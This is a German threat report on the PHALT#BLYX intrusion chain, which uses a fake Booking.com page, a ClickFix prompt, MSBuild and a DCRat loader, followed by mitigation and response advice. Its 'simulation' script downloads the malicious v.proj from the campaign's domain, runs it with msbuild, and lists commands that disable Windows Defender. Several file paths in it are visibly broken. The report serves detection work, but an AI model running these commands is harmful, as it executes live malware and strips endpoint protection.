PHALT#BLYX-Analyse: Gefälschte BSODs und vertrauenswürdige Build-Tools in Malware-Ketten

Zusammenfassung

Der Bericht beschreibt eine mehrstufige Eindringungskette, die den Gastgewerbesektor betrifft und eine gefälschte Booking.com-Seite, eine irreführende Blue-Screen-Animation und eine ClickFix-ähnliche Aufforderung kombiniert, um Benutzer dazu zu bringen, einen PowerShell-Dropper auszuführen. Dieser Dropper ruft eine MSBuild-Projektdatei ab, die einen angepassten DCRat-Loader ausführt. Der Loader manipuliert Windows Defender, setzt Persistenz mithilfe einer .url-Verknüpfung im Startup-Ordner und injiziert seine Nutzlast in legitime Prozesse. Durch die Nutzung von Bordmitteln wie PowerShell und MSBuild.exe reduzieren die Betreiber offensichtliche Malware-Spuren. Russischsprachige Artefakte in der Kette werden ebenfalls als Hinweis auf die Urheberschaft erwähnt.

Untersuchung

Securonix-Forscher kartierten den Ablauf von Phishing-E-Mails, die „Reservierungsstornierungs“-Links zu einer bösartigen Domain anbieten, dann zu einem PowerShell-Einzeiler, der msbuild.exe lokalisiert, eine v.proj-Datei herunterlädt und diese ausführt. Das v.proj-Projekt führt mehrere Aktionen aus: Es fügt Ausschlüsse in Windows Defender hinzu, lädt staxs.exe (eine DCRat-Variante) herunter, erstellt eine .url-Verknüpfung im Startup-Ordner zur Persistenz und verbindet sich über Port 3535 mit der Befehls- und Steuerinfrastruktur. Der Loader komprimiert dann die Endphase und injiziert sie in aspnet_compiler.exe, wobei Prozess Hollowing verwendet wird, um sich in legitime Aktivitäten zu integrieren.

Minderung

Reduzieren Sie die Exposition, indem Sie Benutzer darin schulen, ClickFix-ähnliche Aufforderungen und „führen Sie diesen Befehl aus, um zu reparieren“ soziale Manipulation zu erkennen. Überwachen und beschränken Sie die Ausführung von MSBuild.exe – insbesondere, wenn es aus ungewöhnlichen Pfaden oder benutzergesteuerten Workflows aufgerufen wird – und aktivieren Sie die Protokollierung von PowerShell-Skriptblöcken für bessere Sichtbarkeit. Fügen Sie Erkennungen für die Erstellung von .url-Verknüpfungen im Startup-Ordner und für Änderungen an Windows Defender-Ausschlüssen hinzu. Blockieren Sie auf Netzwerkebene den ausgehenden Datenverkehr zu den identifizierten bösartigen Domains und beschränken Sie explizit oder warnen Sie vor verdächtigem ausgehendem Datenverkehr zu TCP/3535, wo es nicht erforderlich ist.

Reaktion

Wenn Aktivitäten erkannt werden, isolieren Sie den Host und sichern Sie wichtige Artefakte, einschließlich v.proj, staxs.exe und alle .url-Dateien im Startup-Ordner. Entfernen Sie unautorisierte Defender-Ausschlüsse, beenden Sie bösartige oder injizierte Prozesse und blockieren Sie zugehörige C2-Domains/IPs – insbesondere alle Kommunikationen über Port 3535. Setzen Sie potenziell kompromittierte Anmeldeinformationen zurück, führen Sie einen vollständigen Malware-Scan durch und untersuchen Sie die Umgebung auf ähnliche MSBuild-gesteuerte Ausführungen und PowerShell-Befehlsmuster. Implementieren Sie abschließend Bedrohungsinformationsgestützte Erkennungen, die sich auf den Missbrauch von MSBuild, das Verhalten von ClickFix und die Persistenz durch Startup-Verknüpfungen konzentrieren, um ein Wiederauftreten zu verhindern.

Simulation Ausführung

Voraussetzung: Die Telemetrie- & Baseline-Vorprüfung muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der Gegnertechnik (TTP), die darauf ausgelegt ist, die Erkennungsregel auszulösen. Die Befehle und die narrative Darstellung reflektieren direkt die identifizierten TTPs und zielen darauf ab, die genau erwartete Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.

• Angreifernarrativ & Befehle:
  Der Bedrohungsakteur öffnet eine PowerShell-Sitzung auf einem kompromittierten Endpunkt. Zuerst findet er die msbuild.exe Binärdatei auf dem System, dann lädt er ein bösartiges MSBuild-Projekt (v.proj) nach C:ProgramData. Der Angreifer ruft sofort msbuild.exe auf, um die Nutzlast auszuführen, die eine zweite Stufe fallen lässt. Schließlich manipuliert er Windows Defender, indem er Ausschlüsse hinzufügt und das Echtzeit-Überwachungsprogramm deaktiviert, um die Persistenz sicherzustellen.

• Regressions-Testskript:

  # PHALT#BLYX-Simulationsskript – reproduziert erkennungsauslösende Aktivitäten
  # --------------------------------------------------------------
  # 1. Finden Sie msbuild.exe
  $msb = (Get-ChildItem -Path C: -Filter msbuild.exe -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1).FullName
  
  # 2. Laden Sie das bösartige MSBuild-Projekt in ProgramData herunter
  $projUrl = "https://2fa-bns.com/v.proj"
  $dest    = "$env:ProgramDatav.proj"
  Invoke-WebRequest -Uri $projUrl -OutFile $dest
  
  # 3. Führen Sie das Projekt mit msbuild.exe aus
  & $msb $dest
  
  # 4. Ändern Sie die Windows Defender-Einstellungen (einer der folgenden wird die Regel zufriedenstellen)
  #    Kommentieren Sie die gewünschten Zeilen aus, um die Aktionen des Angreifers zu simulieren.
  
  # Ausschlusspfad hinzufügen
  # Add-MpPreference -ExclusionPath "$env:ProgramData"
  
  # Ausschluss für .exe Dateien hinzufügen
  # Add-MpPreference -ExclusionExtension ".exe"
  
  # Ausschluss für .ps1 Dateien hinzufügen
  # Add-MpPreference -ExclusionExtension ".ps1"
  
  # Deaktivieren Sie die Echtzeitüberwachung
  # Set-MpPreference -DisableRealtimeMonitoring $true

• Bereinigungskommandos:

  # Entfernen Sie die abgelegte Projektdatei
  Remove-Item -Path "$env:ProgramDatav.proj" -Force -ErrorAction SilentlyContinue
  
  # Stellen Sie die Echtzeitüberwachung von Windows Defender wieder her (falls sie deaktiviert war)
  Set-MpPreference -DisableRealtimeMonitoring $false
  
  # Entfernen Sie alle hinzugefügten Ausschlüsse (Beispiel für Pfadausschluss)
  Remove-MpPreference -ExclusionPath "$env:ProgramData"
  
  # Optional löschen Sie alle verbleibenden Dateien, die von der Nutzlast erstellt wurden
  # Remove-Item -Path "C:ProgramDatamalicious_payload.exe" -Force -ErrorAction SilentlyContinue